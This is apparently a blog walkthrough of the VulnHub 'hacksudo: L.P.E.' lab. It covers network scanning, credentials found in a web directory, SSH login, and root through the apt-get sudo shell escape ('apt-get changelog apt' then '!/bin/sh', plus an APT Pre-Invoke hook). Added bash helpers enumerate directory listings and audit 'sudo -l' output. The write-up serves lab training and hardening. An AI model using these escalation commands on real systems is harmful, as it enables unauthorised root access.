Vulnhub: Hacksudo LPE machine, detailed walkthrough

Hacksudo LPE

Author: Jason_huawen

Basic machine information

Name: hacksudo: L.P.E.

Address: hacksudo: L.P.E. ~ VulnHub

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.126.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:96:d2:34      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.215  08:00:27:b3:96:72      1      60  PCS Systemtechnik GmbH        

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.215 (the .1 and .100 entries are the usual VirtualBox host-only adapter and its DHCP server, not targets).

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.215 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 08:58 EST
Nmap scan report for localhost (192.168.56.215)
Host is up (0.00038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:ad:52:59:dc:7f:b0:e3:5b:47:36:d2:e7:1d:1a:5a (RSA)
|   256 d6:3f:d5:8e:fe:10:f5:bc:2c:a8:53:3b:78:ec:30:4e (ECDSA)
|_  256 b5:1e:df:2d:3f:3f:c6:f9:ca:37:a7:dc:8c:ba:c2:fa (ED25519)
80/tcp   open  http     Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
4200/tcp open  ssl/http ShellInABox
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=debian
| Not valid before: 2021-05-01T13:03:08
|_Not valid after:  2041-04-26T13:03:08
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:B3:96:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.51 seconds

The Nmap scan shows three open ports: 22 (SSH), 80 (HTTP) and 4200 (ShellInABox, a browser-based terminal served over HTTPS).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ nikto -h http://192.168.56.215
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.215
+ Target Hostname:    192.168.56.215
+ Target Port:        80
+ Start Time:         2022-11-23 09:01:19 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-11-23 09:02:11 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Nikto reports a few items (/login.php, /config.php, directory indexing on /css/ and /img/, missing security headers), but nothing directly exploitable.

Next, run Gobuster against the site to look for other files and directories:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ gobuster dir -u http://192.168.56.215 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.215
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2022/11/23 09:03:15 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/contact.php          (Status: 200) [Size: 82287]
/about.php            (Status: 200) [Size: 73082]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.215/img/]
/products.html        (Status: 200) [Size: 16638]
/login.php            (Status: 200) [Size: 2886]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/header.php           (Status: 302) [Size: 0] [--> /login.php]
/p                    (Status: 301) [Size: 312] [--> http://192.168.56.215/p/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.215/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.215/js/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.215/javascript/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/accounts.html        (Status: 200) [Size: 9057]
/config.php           (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.215/fonts/]
/challenge            (Status: 301) [Size: 320] [--> http://192.168.56.215/challenge/]
/det                  (Status: 301) [Size: 314] [--> http://192.168.56.215/det/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102060 / 1102805 (99.93%)===============================================================
2022/11/23 09:05:51 Finished
===============================================================

Gobuster turns up a /challenge directory that Nikto missed; request it:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ curl http://192.168.56.215/challenge/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /challenge</title>
 </head>
 <body>
<h1>Index of /challenge</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="apt-get.php">apt-get.php</a></td><td align="right">2021-05-10 03:49  </td><td align="right">2.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge.php">challenge.php</a></td><td align="right">2021-04-26 02:56  </td><td align="right">816 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge1.php">challenge1.php</a></td><td align="right">2021-05-16 01:43  </td><td align="right">2.9K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge2.php">challenge2.php</a></td><td align="right">2021-05-16 01:43  </td><td align="right">2.1K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge3.php">challenge3.php</a></td><td align="right">2021-05-16 01:43  </td><td align="right">1.7K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge4.php">challenge4.php</a></td><td align="right">2021-05-16 01:44  </td><td align="right">1.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge5.php">challenge5.php</a></td><td align="right">2021-05-16 01:44  </td><td align="right">1.6K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge6.php">challenge6.php</a></td><td align="right">2021-05-16 01:44  </td><td align="right">1.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge8.php">challenge8.php</a></td><td align="right">2021-05-16 01:45  </td><td align="right">1.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge9.php">challenge9.php</a></td><td align="right">2021-05-16 01:45  </td><td align="right">1.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge10.php">challenge10.php</a></td><td align="right">2021-05-16 01:46  </td><td align="right">1.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge11.php">challenge11.php</a></td><td align="right">2021-05-13 05:28  </td><td align="right">1.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="demo.php">demo.php</a></td><td align="right">2021-05-10 03:55  </td><td align="right">2.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="flag.php">flag.php</a></td><td align="right">2021-05-10 05:21  </td><td align="right">917 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="logo.png">logo.png</a></td><td align="right">2021-04-26 04:31  </td><td align="right"> 29K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="page/">page/</a></td><td align="right">2021-05-16 01:26  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.215 Port 80</address>
</body></html>
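The /challenge listing is a plain Apache autoindex page, and there are fifteen entries to read through. The helper below is an added example (not part of the original write-up) that extracts the entry names from such a listing so each file can be fetched and read in turn instead of clicked through; the sample HTML is a constructed, trimmed copy of the listing returned above, and the host/URL in the usage comment is the target from this write-up.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: pull the entry names out of
# an Apache autoindex page ("Index of /challenge" above) so the files can be
# fetched and read one by one.

# Reads autoindex HTML on stdin and prints one entry per line.
# Drops the column-sort links (?C=N;O=D ...) and the "Parent Directory" link (/).
list_autoindex() {
    grep -o '<a href="[^"]*">' \
      | sed 's/^<a href="\([^"]*\)">$/\1/' \
      | grep -v -e '^?' -e '^/$'
}

# Turns entry names into absolute URLs under BASE. Directories keep their
# trailing slash, so their URLs can be fed straight back into list_autoindex.
# Usage: list_autoindex < index.html | entry_urls http://host/challenge/
entry_urls() {
    local base=$1 entry
    while IFS= read -r entry; do
        printf '%s%s\n' "$base" "$entry"
    done
}

# Constructed sample: a trimmed copy of the listing the target returned.
SAMPLE_INDEX='<h1>Index of /challenge</h1>
<tr><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th></tr>
<tr><td><a href="/">Parent Directory</a></td></tr>
<tr><td><a href="apt-get.php">apt-get.php</a></td></tr>
<tr><td><a href="challenge.php">challenge.php</a></td></tr>
<tr><td><a href="flag.php">flag.php</a></td></tr>
<tr><td><a href="page/">page/</a></td></tr>'

# Wrapper over the constructed sample so the result can be checked offline.
sample_entries() { printf '%s\n' "$SAMPLE_INDEX" | list_autoindex; }

# Against the live box the whole read-everything loop is:
#   curl -s http://192.168.56.215/challenge/ | list_autoindex \
#     | entry_urls http://192.168.56.215/challenge/ \
#     | while read -r u; do echo "== $u"; curl -s "$u" | sed 's/<[^>]*>//g' | grep -v '^[[:space:]]*$'; done
```

Stripping the tags with sed in the loop is what makes the hint text (and any credentials) visible at a glance; the raw HTML of apt-get.php, as the next curl shows, is mostly Bootstrap markup.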

The first entry in the /challenge listing, apt-get.php, contains a username and password. Note that the curl output below is truncated (the `<style>` block and the body text are missing from the capture), so the credentials themselves, user1 / hacksudo, do not appear in it; they are used in the next step.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ curl http://192.168.56.215/challenge/apt-get.php
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>

<h2 style="padding-bottom: 190px;"></h2>
<form method="post" action="../challenge/challenge1.php">
   <button type="submit"  class="btn btn-outline-dark" style="margin-bottom: -100px">Back</button>
</form>
<h3><p style="text-align:right;"><a href="https://leetvilu.blogspot.com/">For more information about apt-get</a></p></h3>
</body>

<hr class="hr">
<div class="container">
<footer class="footer">
        <center><p style="margin-left:65px; color:#777777" class="text-center" >&copy; HackSudo 2021</p></center>
      </footer>
      
</div>
<script src="../../assets/js/ie10-viewport-bug-workaround.js"></script>
</html>

Try logging in over SSH with username user1 and password hacksudo:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ ssh user1@192.168.56.215 
The authenticity of host '192.168.56.215 (192.168.56.215)' can't be established.
ED25519 key fingerprint is SHA256:iSCtzn93Zn0wahmO4fJNBoPyqcsZCVH++PlJTVmt7Xs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.215' (ED25519) to the list of known hosts.
user1@192.168.56.215's password: 
Linux hacksudoLPE 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 16 04:16:42 2021 from 192.168.1.4
user1@hacksudoLPE:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@hacksudoLPE:~$ 

Privilege escalation

user1@hacksudoLPE:~$ sudo -l
Matching Defaults entries for user1 on hacksudoLPE:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user1 may run the following commands on hacksudoLPE:
    (root) NOPASSWD: /usr/bin/apt-get
user1@hacksudoLPE:~$ 

sudo -l shows that user1 may run /usr/bin/apt-get as root without a password. apt-get has a GTFOBins entry: `apt-get changelog apt` hands the changelog to the pager (less), and typing `!/bin/sh` at the pager prompt spawns a shell as root. The `!/bin/sh` keystrokes are not echoed in the transcript below, which is why the `#` prompt appears right after "Fetched".

user1@hacksudoLPE:~$ sudo /usr/bin/apt-get changelog apt
Get:1 store: apt 1.8.2.2 Changelog
Fetched 458 kB in 0s (44.3 MB/s)
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 68K
drwx------  5 root root 4.0K May 16  2021 .
drwxr-xr-x 21 root root 4.0K May  7  2021 ..
-rw-------  1 root root 1.8K May 16  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4.0K May  6  2021 .gnupg
-rw-------  1 root root   36 May  1  2021 .lesshst
drwxr-xr-x  3 root root 4.0K May  1  2021 .local
-rw-------  1 root root    0 May  6  2021 .node_repl_history
-rw-r--r--  1 root root  176 May  1  2021 .profile
-rw-r--r--  1 root root   11 May 16  2021 root.txt
-rw-r--r--  1 root root   75 May  8  2021 .selected_editor
drwx------  2 root root 4.0K May 16  2021 .ssh
-rw-------  1 root root  24K May 16  2021 .viminfo
# cat root.txt
viluhacker

Privilege escalation succeeded and the root flag is read. For anyone hardening a real host: a sudo rule for apt-get is equivalent to a root shell unless its arguments are pinned exactly (no wildcards), because both the changelog pager and the `-o APT::Update::Pre-Invoke::=...` hook are reachable through the unrestricted binary.
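The apt-get rule is one instance of a general pattern: any sudo-allowed binary that opens a pager, an editor, an interpreter or a hook is a root shell. The script below is an added example (not from the original write-up) that parses `sudo -l` output and flags rules whose binary is on a short, hand-picked list of GTFOBins shell-escape candidates, so this class of finding is caught mechanically. The sample input is constructed from the `sudo -l` output above plus one extra comma-separated rule to show that per-command NOPASSWD tags are tracked; the list of binaries is deliberately incomplete and meant to be extended from https://gtfobins.github.io/.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: scan `sudo -l` output for
# rules that hand the user a GTFOBins-style shell escape. For apt-get the
# documented escapes are
#   sudo apt-get changelog apt          -> type !/bin/sh at the less prompt
#   sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# Deliberately short, hand-picked list (assumption); extend from gtfobins.github.io.
ESCAPABLE_BINS="apt-get apt less more man vi vim nano find awk env perl python3"

# Reads `sudo -l` output on stdin and prints "<runas> <NOPASSWD|PASSWD> <command>"
# for every command whose binary is in ESCAPABLE_BINS. Everything else is ignored.
# Tags (NOPASSWD:, PASSWD:, SETENV: ...) apply to the command they precede and
# to later commands on the same line, which is how sudo prints them.
audit_sudo_l() {
    local line runas tag entry t bin
    local -a entries
    while IFS= read -r line; do
        line=${line#"${line%%[![:space:]]*}"}      # strip leading whitespace
        case "$line" in
            "("*")"*) ;;                            # rule lines look like "(root) ... /path"
            *) continue ;;
        esac
        runas=${line#\(}; runas=${runas%%\)*}
        tag=PASSWD                                  # sudo's default unless a tag says otherwise
        IFS=',' read -ra entries <<< "${line#*\) }" # "cmd1, NOPASSWD: cmd2, ..."
        for entry in "${entries[@]}"; do
            entry=${entry#"${entry%%[![:space:]]*}"}
            # consume leading ALL-CAPS tags such as "NOPASSWD:" or "SETENV: NOPASSWD:"
            while :; do
                case "$entry" in
                    *": "*) t=${entry%%: *} ;;
                    *) break ;;
                esac
                case "$t" in *[!A-Z]*) break ;; esac   # not a tag: it is the command
                case "$t" in NOPASSWD) tag=NOPASSWD ;; PASSWD) tag=PASSWD ;; esac
                entry=${entry#*: }
            done
            set -- $entry                           # first word is the binary path
            bin=${1##*/}
            case " $ESCAPABLE_BINS " in
                *" $bin "*) printf '%s %s %s\n' "$runas" "$tag" "$entry" ;;
            esac
        done
    done
}

# Constructed sample: the rule from this box plus one extra line showing a
# restricted-argument vim rule, which is still an escape (:!sh inside vim).
SAMPLE_SUDO_L='Matching Defaults entries for user1 on hacksudoLPE:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user1 may run the following commands on hacksudoLPE:
    (root) NOPASSWD: /usr/bin/apt-get
    (root) /usr/bin/systemctl restart apache2, NOPASSWD: /usr/bin/vim /etc/hosts'

# Wrapper over the constructed sample; on a live host use:  sudo -l | audit_sudo_l
sample_findings() { printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l; }
```

Running it on the constructed sample reports the apt-get rule and the vim rule, and stays silent on systemctl. A binary that is on the list with arguments pinned in sudoers (the vim line) is still reported on purpose: argument pinning does not remove an editor's `:!` escape, so the rule has to be judged by what the binary can do, not by what it was told to open.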

posted @ 2022-11-23 22:30  Jason_huawen